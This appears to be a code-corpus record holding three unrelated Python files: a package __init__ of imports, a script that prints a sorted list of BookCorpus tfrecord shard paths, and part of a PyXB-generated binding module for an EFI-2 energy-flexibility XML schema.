| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
15ce56f0be7b921cd2969b5a04f6078306327267
| 249
|
py
|
Python
|
ML_utils/__init__.py
|
MaximeRedstone/UnstructuredCAE-DA
|
b54bd53540c11aa1b70e5160751905141f463217
|
[
"MIT"
] | null | null | null |
ML_utils/__init__.py
|
MaximeRedstone/UnstructuredCAE-DA
|
b54bd53540c11aa1b70e5160751905141f463217
|
[
"MIT"
] | null | null | null |
ML_utils/__init__.py
|
MaximeRedstone/UnstructuredCAE-DA
|
b54bd53540c11aa1b70e5160751905141f463217
|
[
"MIT"
] | null | null | null |
from UnstructuredCAEDA.ML_utils.helpers import set_seeds, load_AE, get_device
from UnstructuredCAEDA.ML_utils.helpers import load_model_from_settings, load_model_and_settings_from_dir
from UnstructuredCAEDA.ML_utils.convolution import ConvScheduler
| 62.25
| 105
| 0.903614
| 35
| 249
| 6.028571
| 0.514286
| 0.298578
| 0.327014
| 0.398104
| 0.388626
| 0.388626
| 0
| 0
| 0
| 0
| 0
| 0
| 0.060241
| 249
| 3
| 106
| 83
| 0.901709
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
c631bc60f5c8e65d2f5a8a93bac9b505c577fa9b
| 14,537
|
py
|
Python
|
scripts/list_tfrecords.py
|
cybertronai/Megatron-LM
|
4c766958a5b41ea1d7e472afa98a0a1a45aed865
|
[
"Apache-2.0"
] | 14
|
2019-04-30T06:11:53.000Z
|
2021-04-16T09:26:48.000Z
|
scripts/list_tfrecords.py
|
cybertronai/Megatron-LM
|
4c766958a5b41ea1d7e472afa98a0a1a45aed865
|
[
"Apache-2.0"
] | null | null | null |
scripts/list_tfrecords.py
|
cybertronai/Megatron-LM
|
4c766958a5b41ea1d7e472afa98a0a1a45aed865
|
[
"Apache-2.0"
] | 5
|
2019-05-05T22:56:11.000Z
|
2021-04-16T09:30:27.000Z
|
#!/usr/bin/env python
# Result is
# /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0000 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0001 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0002 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0003 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0004 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0005 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0006 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0007 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0008 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord0009 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00010 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00011 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00012 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00013 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00014 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00015 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00016 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00017 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00018 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00019 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00020 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00021 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00022 
/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00023 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00024 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00025 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00026 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00027 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00028 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00029 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00030 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00031 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00032 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00033 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00034 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00035 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00036 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00037 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00038 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00039 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00040 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00041 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00042 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00043 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00044 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00045 
/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00046 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00047 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00048 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00049 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00050 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00051 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00052 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00053 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00054 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00055 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00056 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00057 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00058 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00059 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00060 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00061 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00062 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00063 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00064 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00065 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00066 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00067 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00068 
/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00069 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00070 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00071 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00072 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00073 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00074 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00075 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00076 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00077 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00078 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00079 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00080 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00081 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00082 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00083 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00084 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00085 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00086 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00087 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00088 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00089 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00090 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00091 
/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00092 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00093 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00094 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00095 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00096 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00097 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00098 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord00099 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000100 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000101 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000102 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000103 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000104 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000105 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000106 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000107 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000108 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000109 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000110 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000111 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000112 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000113 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000114 
/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000115 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000116 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000117 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000118 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000119 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000120 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000121 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000122 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000123 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000124 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000125 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000126 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000127 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000128 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000129 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000130 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000131 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000132 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000133 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000134 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000135 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000136 
/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000137 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000138 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000139 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000140 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000141 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000142 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000143 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000144 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000145 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000146 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000147 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000148 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000149 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000150 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000151 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000152 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000153 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000154 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000155 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000156 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000157 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000158 
/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000159 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000160 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000161 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000162 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000163 /ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded/tf_examples.tfrecord000164
import os
from natsort import natsorted

# Directory holding the sharded BERT pre-training tfrecord files.
location = '/ncluster/data/bookcorpus.tfrecords/final_tfrecords_sharded'

# Collect every tfrecord shard in natural (numeric-aware) order and print
# them space-separated, ready to paste into a training command line.
# Comprehension + os.path.join replaces the manual append loop and
# string '+' path concatenation.
files = [os.path.join(location, fn)
         for fn in natsorted(os.listdir(location))
         if 'tfrecord' in fn]
print(' '.join(files))
| 855.117647
| 14,246
| 0.903281
| 1,689
| 14,537
| 7.480166
| 0.115453
| 0.15767
| 0.289061
| 0.407314
| 0.813836
| 0.813836
| 0.813836
| 0.80972
| 0.80972
| 0
| 0
| 0.061418
| 0.014377
| 14,537
| 16
| 14,247
| 908.5625
| 0.820352
| 0.981977
| 0
| 0
| 0
| 0
| 0.267442
| 0.228682
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.25
| 0
| 0.25
| 0.125
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
c6440e1ff0ccfa608884f09f3edbb4df6bf50163
| 502,222
|
py
|
Python
|
universal-dimmer-python/service/model/InflexibleControllerEfi20/xsd.py
|
flexiblepower/defpi-tutorial
|
59b57290444cf01ee4094bfac00c061c9474882a
|
[
"Apache-2.0"
] | 1
|
2021-04-13T00:34:35.000Z
|
2021-04-13T00:34:35.000Z
|
universal-dimmer-python/service/model/InflexibleControllerEfi20/xsd.py
|
flexiblepower/defpi-tutorial
|
59b57290444cf01ee4094bfac00c061c9474882a
|
[
"Apache-2.0"
] | 1
|
2018-10-01T13:21:50.000Z
|
2018-10-06T08:14:01.000Z
|
universal-dimmer-python/service/model/InflexibleControllerEfi20/xsd.py
|
flexiblepower/defpi-tutorial
|
59b57290444cf01ee4094bfac00c061c9474882a
|
[
"Apache-2.0"
] | 3
|
2020-02-16T11:46:40.000Z
|
2021-06-15T12:56:13.000Z
|
# service/model/InflexibleControllerEfi20/xsd.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:b550fb16b19cc058aca9062a23ea1ae456ced48d
# Generated 2018-08-10 09:57:06.989505 by PyXB version 1.2.6 using Python 3.6.6.final.0
# Namespace http://www.flexiblepower.org/efi-2
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:bd54841e-9c83-11e8-9b68-0242ac110004')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.6'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# A holder for module-level binding classes so we can access them from
# inside class definitions where property names may conflict.
_module_typeBindings = pyxb.utils.utility.Object()
# Import bindings for namespaces imported into schema
import pyxb.binding.datatypes
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://www.flexiblepower.org/efi-2', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
    """Parse the given XML and use the document element to create a
    Python instance.

    @param xml_text An XML document. This should be data (Python 2
    str or Python 3 bytes), or a text (Python 2 unicode or Python 3
    str) in the L{pyxb._InputEncoding} encoding.

    @keyword default_namespace The L{pyxb.Namespace} instance to use as the
    default namespace where there is no default namespace in scope.
    If unspecified or C{None}, the namespace of the module containing
    this function will be used.

    @keyword location_base: An object to be recorded as the base of all
    L{pyxb.utils.utility.Location} instances associated with events and
    objects handled by the parser.  You might pass the URI from which
    the document was obtained.
    """
    # If the runtime is not configured for SAX-style parsing, fall back to
    # building a DOM tree and converting its document element instead.
    if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
        dom = pyxb.utils.domutils.StringToDOM(xml_text)
        return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
    handler = saxer.getContentHandler()
    xmld = xml_text
    # The SAX parser consumes bytes; encode text input with the configured
    # input encoding before wrapping it in a BytesIO stream.
    if isinstance(xmld, _six.text_type):
        xmld = xmld.encode(pyxb._InputEncoding)
    saxer.parse(io.BytesIO(xmld))
    instance = handler.rootObject()
    return instance
def CreateFromDOM (node, default_namespace=None):
    """Create a Python instance from the given DOM node.

    The node tag must correspond to an element declaration in this module.

    @deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
    if default_namespace is None:
        default_namespace = Namespace.fallbackNamespace()
    # Delegate to the generic PyXB element factory, which resolves the node
    # tag against the element bindings registered in this namespace.
    return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: {http://www.flexiblepower.org/efi-2}InstructionStatus
class InstructionStatus (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
    """XSD string enumeration of instruction lifecycle states:
    ACCEPTED, STARTED, SUCCEEDED, REJECTED, ABORTED."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'InstructionStatus')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 87, 1)
    _Documentation = None
InstructionStatus._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=InstructionStatus, enum_prefix=None)
# Register each legal value; tag and lexical value coincide for this type.
for _v in ('ACCEPTED', 'STARTED', 'SUCCEEDED', 'REJECTED', 'ABORTED'):
    setattr(InstructionStatus, _v, InstructionStatus._CF_enumeration.addEnumeration(unicode_value=_v, tag=_v))
del _v
InstructionStatus._InitializeFacetMap(InstructionStatus._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'InstructionStatus', InstructionStatus)
_module_typeBindings.InstructionStatus = InstructionStatus
# Atomic simple type: {http://www.flexiblepower.org/efi-2}CommodityEnum
class CommodityEnum (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
    """XSD string enumeration of energy commodities: ELECTRICITY, GAS, HEAT."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CommodityEnum')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 114, 1)
    _Documentation = None
CommodityEnum._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CommodityEnum, enum_prefix=None)
# Register each legal value; tag and lexical value coincide for this type.
for _v in ('ELECTRICITY', 'GAS', 'HEAT'):
    setattr(CommodityEnum, _v, CommodityEnum._CF_enumeration.addEnumeration(unicode_value=_v, tag=_v))
del _v
CommodityEnum._InitializeFacetMap(CommodityEnum._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CommodityEnum', CommodityEnum)
_module_typeBindings.CommodityEnum = CommodityEnum
# Atomic simple type: {http://www.flexiblepower.org/efi-2}CurtailmentQuantity
class CurtailmentQuantity (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
    """XSD string enumeration of curtailable quantities
    (COMMODITY.QUANTITY form, e.g. 'ELECTRICITY.POWER')."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurtailmentQuantity')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 121, 1)
    _Documentation = None
CurtailmentQuantity._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CurtailmentQuantity, enum_prefix=None)
# Python tags replace the '.' in the lexical value with '_'.
for _tag, _value in (
        ('ELECTRICITY_POWER', 'ELECTRICITY.POWER'),
        ('GAS_FLOWRATE', 'GAS.FLOWRATE'),
        ('HEAT_TEMPERATURE', 'HEAT.TEMPERATURE'),
        ('HEAT_FLOWRATE', 'HEAT.FLOWRATE'),
        ('HEAT_THERMALPOWER', 'HEAT.THERMALPOWER')):
    setattr(CurtailmentQuantity, _tag, CurtailmentQuantity._CF_enumeration.addEnumeration(unicode_value=_value, tag=_tag))
del _tag, _value
CurtailmentQuantity._InitializeFacetMap(CurtailmentQuantity._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CurtailmentQuantity', CurtailmentQuantity)
_module_typeBindings.CurtailmentQuantity = CurtailmentQuantity
# Atomic simple type: {http://www.flexiblepower.org/efi-2}CurrencyType
class CurrencyType (pyxb.binding.datatypes.string, pyxb.binding.basis.enumeration_mixin):
    """XSD string enumeration of three-letter currency codes
    (ISO-4217-style, per the schema's enumeration list)."""
    _ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'CurrencyType')
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 469, 1)
    _Documentation = None
CurrencyType._CF_enumeration = pyxb.binding.facets.CF_enumeration(value_datatype=CurrencyType, enum_prefix=None)
# Register every currency code; tag and lexical value are identical, and
# registration order matches the schema's enumeration order.
for _code in (
        'AED', 'ANG', 'AUD', 'CHE', 'CHF', 'CHW', 'EUR', 'GBP', 'LBP', 'LKR',
        'LRD', 'LSL', 'LYD', 'MAD', 'MDL', 'MGA', 'MKD', 'MMK', 'MNT', 'MOP',
        'MRO', 'MUR', 'MVR', 'MWK', 'MXN', 'MXV', 'MYR', 'MZN', 'NAD', 'NGN',
        'NIO', 'NOK', 'NPR', 'NZD', 'OMR', 'PAB', 'PEN', 'PGK', 'PHP', 'PKR',
        'PLN', 'PYG', 'QAR', 'RON', 'RSD', 'RUB', 'RWF', 'SAR', 'SBD', 'SCR',
        'SDG', 'SEK', 'SGD', 'SHP', 'SLL', 'SOS', 'SRD', 'SSP', 'STD', 'SYP',
        'SZL', 'THB', 'TJS', 'TMT', 'TND', 'TOP', 'TRY', 'TTD', 'TWD', 'TZS',
        'UAH', 'UGX', 'USD', 'USN', 'UYI', 'UYU', 'UZS', 'VEF', 'VND', 'VUV',
        'WST', 'XAG', 'XAU', 'XBA', 'XBB', 'XBC', 'XBD', 'XCD', 'XOF', 'XPD',
        'XPF', 'XPT', 'XSU', 'XTS', 'XUA', 'XXX', 'YER', 'ZAR', 'ZMW', 'ZWL'):
    setattr(CurrencyType, _code, CurrencyType._CF_enumeration.addEnumeration(unicode_value=_code, tag=_code))
del _code
CurrencyType._InitializeFacetMap(CurrencyType._CF_enumeration)
Namespace.addCategoryObject('typeBinding', 'CurrencyType', CurrencyType)
_module_typeBindings.CurrencyType = CurrencyType
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.double):
    """Anonymous atomic simple type: a double restricted to [0.0, 1.0]."""
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 712, 4)
    _Documentation = None
# Constrain the value space to the closed interval [0.0, 1.0].
STD_ANON._CF_maxInclusive = pyxb.binding.facets.CF_maxInclusive(value_datatype=STD_ANON, value=pyxb.binding.datatypes.double(1.0))
STD_ANON._CF_minInclusive = pyxb.binding.facets.CF_minInclusive(value_datatype=STD_ANON, value=pyxb.binding.datatypes.double(0.0))
STD_ANON._InitializeFacetMap(STD_ANON._CF_minInclusive, STD_ANON._CF_maxInclusive)
_module_typeBindings.STD_ANON = STD_ANON
# Atomic simple type: [anonymous]
class STD_ANON_ (pyxb.binding.datatypes.double):
    """Anonymous atomic simple type: a double restricted to [0.0, 1.0]."""
    _ExpandedName = None
    _XSDLocation = pyxb.utils.utility.Location('/usr/local/defpi/resources/xsd/InflexibleControllerEfi20.xsd', 786, 4)
    _Documentation = None
# Constrain the value space to the closed interval [0.0, 1.0].
